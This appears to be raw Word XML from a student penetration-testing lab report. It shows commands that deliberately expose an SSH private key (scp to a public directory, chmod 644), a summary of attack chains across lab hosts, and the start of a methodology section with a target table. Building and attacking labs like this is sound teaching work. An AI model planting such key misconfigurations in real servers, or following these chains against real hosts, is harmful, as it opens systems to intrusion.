          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat /home/secretuser/.ssh/key_Zain.pem.pub &gt;&gt; /home/secretuser/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52427E33" w14:textId="77777777" w:rsidR="00F8700B" w:rsidRPr="00D77DFE" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The private key was copied to ServerMeta (10.0.3.190) and placed in a publicly accessible directory with overly permissive file permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AAD5E6" w14:textId="7288C392" w:rsidR="00F8700B" w:rsidRPr="00D77DFE" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy private key to ServerMeta (Subnet 3): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDCA2CE" w14:textId="77777777" w:rsidR="00F8700B" w:rsidRPr="009025BF" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scp secretuser@10.0.4.141:/home/secretuser/.ssh/key_Zain.pem \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F62611" w14:textId="3507A64D" w:rsidR="00F8700B" w:rsidRPr="009025BF" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    /home/public/key_Zain.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F3523" w14:textId="29705D0F" w:rsidR="00F8700B" w:rsidRPr="009025BF" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Set insecure permissions (world-readable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523A687" w14:textId="0ED873E7" w:rsidR="00F8700B" w:rsidRPr="009025BF" w:rsidRDefault="00F8700B" w:rsidP="00F8700B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chmod 644 /home/public/key_Zain.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1905AC" w14:textId="1004923D" w:rsidR="00961685" w:rsidRPr="00EA3D53" w:rsidRDefault="00961685" w:rsidP="00961685">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3D53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB61AA" w14:textId="77777777" w:rsidR="00961685" w:rsidRPr="00D77DFE" w:rsidRDefault="00961685" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The configurations across VulnWeb and ServerMeta create a comprehensive attack chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE89DA" w14:textId="77777777" w:rsidR="00961685" w:rsidRPr="00D77DFE" w:rsidRDefault="00961685" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>VulnWeb (Subnet 2): Initial Access (Tomcat credentials) → Foothold (redlowo) → Hash Extraction (sudo) → Lateral Movement (Docker to sopot) → Root Access (cron job)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2633573E" w14:textId="28C8DD09" w:rsidR="00416FDF" w:rsidRDefault="00961685" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ServerMeta (Subnet 3): Web Exploitation (RCE via command injection/SSTI) → Information Disclosure (LFI for credentials) → Network Pivoting (</w:t>
      </w:r>
      <w:r w:rsidR="00F8700B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>File Upload</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to discover Subnet 4) → Persistence (file upload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0BD25" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071AD3F9" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EAD8A2B" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E58ADD" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6762D0" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3008FDA0" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3808625C" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07ABECCE" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE2CB2F" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRPr="00D77DFE" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8F313B" w14:textId="29E7D40E" w:rsidR="00112C92" w:rsidRPr="00D77DFE" w:rsidRDefault="00D136A7" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc223521119"/>
      <w:bookmarkStart w:id="82" w:name="PenetrationTesting5"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. PENETRATION TESTING: METHODOLOGY AND INSTRUCTIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25644596" w14:textId="34A4F1E0" w:rsidR="009E776C" w:rsidRPr="00D77DFE" w:rsidRDefault="009E776C" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc223521120"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.1 Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="38D225D0" w14:textId="77777777" w:rsidR="00B06CFE" w:rsidRDefault="00B06CFE" w:rsidP="009025BF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The penetration testing begins from the Kali Linux machine at 10.0.1.158 (Subnet 1), equipped with standard tools including Nmap, Burp Suite, Metasploit, John the Ripper, and Hydra (see Table 4.20). The tester has no prior knowledge except the VPC CIDR range (10.0.0.0/16) and can directly access Subnets 2 and 3, while Subnet 4 is isolated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55875707" w14:textId="6D8C4223" w:rsidR="00B251B3" w:rsidRPr="009025BF" w:rsidRDefault="00B251B3" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Systems Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6AED8" w14:textId="7B15BE8F" w:rsidR="00B251B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00B251B3" w:rsidP="00B251B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The testing environment contains three target systems across four network segments</w:t>
      </w:r>
      <w:r w:rsidR="00AD6E34" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is shown in Table 5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B26ADC" w14:textId="2BB6A1B9" w:rsidR="00B06CFE" w:rsidRPr="00D77DFE" w:rsidRDefault="00B06CFE" w:rsidP="009E5B3F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.1: </w:t>
      </w:r>
      <w:r w:rsidR="00AD6E34" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Target systems</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1780"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="930"/>
        <w:gridCol w:w="2435"/>
        <w:gridCol w:w="1668"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B251B3" w:rsidRPr="00D77DFE" w14:paraId="748F77EC" w14:textId="77777777" w:rsidTr="00B251B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CEBF79A" w14:textId="691318B3"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System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6386ABDB" w14:textId="05D9E9C1"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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="407BD364" w14:textId="046DC916"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Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69696D35" w14:textId="169FC025"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Primary Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8F67D8" w14:textId="7E45AAFF"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Access Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B251B3" w:rsidRPr="00D77DFE" w14:paraId="354768E6" w14:textId="77777777" w:rsidTr="00B251B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF88A40" w14:textId="62AE9A8B"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VulnWeb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FDC9A48" w14:textId="77F70193"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10.2.178</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D179E9D" w14:textId="73774D8D"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Subnet 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E2CBA6F" w14:textId="6159B36E"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Weak credentials, sudo misconfig, Docker, cron job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14F92685" w14:textId="5F1F504A"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Direct from Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B251B3" w:rsidRPr="00D77DFE" w14:paraId="07A3D4DD" w14:textId="77777777" w:rsidTr="00B251B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F901C52" w14:textId="3EA39AD6"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ServerMeta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="269B2452" w14:textId="4CF5C979"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10.0.3.190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CD2FEA" w14:textId="0B96136A"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Subnet 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62B3DA7B" w14:textId="1F65844D"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Web vulnerabilities (RCE, LFI, SSRF, file upload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D17C8C" w14:textId="0E889941"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Direct from Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B251B3" w:rsidRPr="00D77DFE" w14:paraId="7B95D152" w14:textId="77777777" w:rsidTr="00B251B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3329D922" w14:textId="479F2BC5"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SecretMachine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="677BC5B1" w14:textId="29CFA6A5"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10.0.4.141</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="125BF710" w14:textId="5767D145"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Subnet 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D21D988" w14:textId="75AA7B57" w:rsidR="00B251B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00B06CFE" w:rsidP="00B251B3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSH key misconfiguration (accessible only from Subnet 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46A32380" w14:textId="7DB6D333" w:rsidR="00B251B3" w:rsidRPr="00D77DFE" w:rsidRDefault="00B251B3" w:rsidP="00B251B3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Via pivoting from Subnet 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32D5205D" w14:textId="77777777" w:rsidR="009025BF" w:rsidRPr="00D77DFE" w:rsidRDefault="009025BF" w:rsidP="00AD6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE4A687" w14:textId="24FA6CE2" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D54EF3" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The testing follows </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>two independent attack paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F42AC2D" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path 1: VulnWeb (Subnet 2) - Complete System Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD40367" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00AD6E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
